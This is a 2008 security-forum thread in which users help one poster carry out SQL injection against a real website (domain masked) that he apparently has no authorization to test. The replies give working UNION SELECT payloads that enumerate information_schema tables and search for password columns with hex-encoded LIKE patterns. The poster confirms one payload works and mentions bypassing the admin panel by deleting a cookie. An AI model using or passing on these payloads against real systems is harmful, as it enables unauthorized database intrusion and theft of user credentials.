|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Help With Injection |
|
Posted: Mon Nov 24, 2008 11:02 pm |
|
|
slsl |
Advanced user |
|
|
Joined: Oct 14, 2008 |
Posts: 66 |
|
|
|
|
|
|
|
Alright so i found an injection and it is in a different database than the users (which i'm looking for) i think and the injection im using to find the tables is
Code: | http://www.**********.com/index.php?a=view&id=660%20UNION%20ALLSELECT%201,table_name,3,4,5,6,7,8,9,10,11,12,13%20FROM%20information_schema.tables%20ORDER%20BY%20id |
but the output i get says CHARACTER_SETS can someone please help me?
EDIT & btw the version is 5.0.67-community
EDIT 2: NVM I got into the admin panel by just deleting a cookie |
|
|
|
|
|
|
|
|
Posted: Tue Nov 25, 2008 2:40 am |
|
|
-AO- |
Advanced user |
|
|
Joined: Jul 15, 2008 |
Posts: 205 |
Location: United States |
|
|
|
|
|
|
Try this:
Code: | Union All Select 1,table_name,3,4,5,6,7,8,9,10,11,12,13 from information_schema.tables order by 1 desc limit 0,1-- |
Then to change the row just change the 0 in limit. Also, you could try using the a like statement...
Code: | Union All Select 1,concat(column_name,0x3a,table_name),3,4,5,6,7,8,9,10,11,12,13 from information_schema.columns where column_name like 0x257061737325 order by 1 desc limit 0,1-- |
0x257061737325 = %pass% |
|
|
|
|
Posted: Tue Nov 25, 2008 2:47 am |
|
|
slsl |
Advanced user |
|
|
Joined: Oct 14, 2008 |
Posts: 66 |
|
|
|
|
|
|
|
Thanks man the second code is working |
|
|
|
|
Posted: Tue Nov 25, 2008 6:01 am |
|
|
-AO- |
Advanced user |
|
|
Joined: Jul 15, 2008 |
Posts: 205 |
Location: United States |
|
|
|
|
|
|
Anytime |
|
|
|
|
Posted: Sat Nov 29, 2008 8:54 pm |
|
|
capt |
Advanced user |
|
|
Joined: Nov 04, 2008 |
Posts: 232 |
|
|
|
|
|
|
|
Could just do
Code: | Union All Select 1,table_name,3,4,5,6,7,8,9,10,11,12,13 from information_schema.tables limit 14,1/* |
Little shorter but both ways work |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|